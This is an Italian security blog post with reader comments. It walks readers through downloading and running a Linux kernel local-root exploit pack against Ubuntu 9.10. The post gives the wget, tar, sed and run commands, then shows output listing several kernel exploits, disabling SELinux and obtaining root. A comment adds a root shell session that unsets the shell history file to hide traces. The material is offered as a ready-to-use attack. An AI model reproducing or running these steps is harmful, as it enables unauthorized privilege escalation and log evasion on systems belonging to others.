ClsHack:Computer Security Blog    

[Exploit]Privilege Escalation Kernel

Posted on: 10 March 2010

Purtroppo anche linux a volte, è un po buggato :(


Pubblico questo exploit, dopo un mese della sua uscita per ovvie ragioni di sicurezza.

I sistemi afflitti da questo bug, sono i seguenti:

  • Ubuntu Ubuntu Linux 9.10 sparc
  • Ubuntu Ubuntu Linux 9.10 powerpc
  • Ubuntu Ubuntu Linux 9.10 lpia
  • Ubuntu Ubuntu Linux 9.10 i386

Continua lettura…
Eseguendo questo exploit, da utenti normali, potremo senza sapere la password di root aprirci una shell rootata.

Vediamo come provare questo exploit…
La prima cosa da fare è scaricare l’exploit.

wget http://www.clshack.com/nopaste/kernelRoot.tar.gz

tar xzvf kernelRoot.tar.gz

cd enlightenment

Ora eseguiamo il tutto:

sed -i '/turn_\(on\|off\)_wp();/d' exploit.c
./run_null_exploits.sh

Output:

Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] Wunderbar Emporium: Linux 2.X sendpage() local root
[6] Exit
> 5
------------------------------------------------------------------------------
The work of an intellectual is not to mould the political will of others; it
is, through the analyses that he does in his own field, to re-examine
evidence and assumptions, to shake up habitual ways of working and thinking,
to dissipate conventional familiarities, to re-evaluate rules and
institutions and to participate in the formation of a political will (where
he has his role as citizen to play). --Foucault
------------------------------------------------------------------------------
[+] Resolved security_ops to 0xffffffff8068d240
[+] Resolved sel_read_enforce to 0xffffffff803184fb
[+] got ring0!
[+] detected 2.6 style 8k stacks, with current at 0xffff88000b1d5040
[+] Disabled security of : SELinux
[+] Got root!

Ciao buon divertimento :D

Related posts:

  1. [Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER
  2. [Samba EXPLOIT]Symlink Traversal (guida metasploit)
  3. [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
  4. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  5. Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit

This entry was posted on Wednesday, March 10th, 2010 at 6:23 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • http://www.goodysound.netsons.org Andy

    Come sempre molto utile Alessio.
    Perciò il kernel 2.6.32 e .33 non è afflitto da questa vulnerabilità?

  • http://www.clshack.it Alessio

    no, cmq non da questa, ma da queste:

    [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
    [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
    [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
    [3] Powerglove: Linux 2.6.31 perf_counter local root
    [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
    [5] Wunderbar Emporium: Linux 2.X sendpage() local root

  • ov3rload

    Era già un po’ che girava! =°P

  • vex

    [+] Disabled security of : nothing, what an insecure machine!
    [+] Got root!
    sh-3.2# unset HISTFILE;unset HISTSAVE
    sh-3.2# id
    uid=0(root) gid=0(root)

    vex:Grazie! ;)

  • clshack

    @vex:

    Felice che tu sia root :D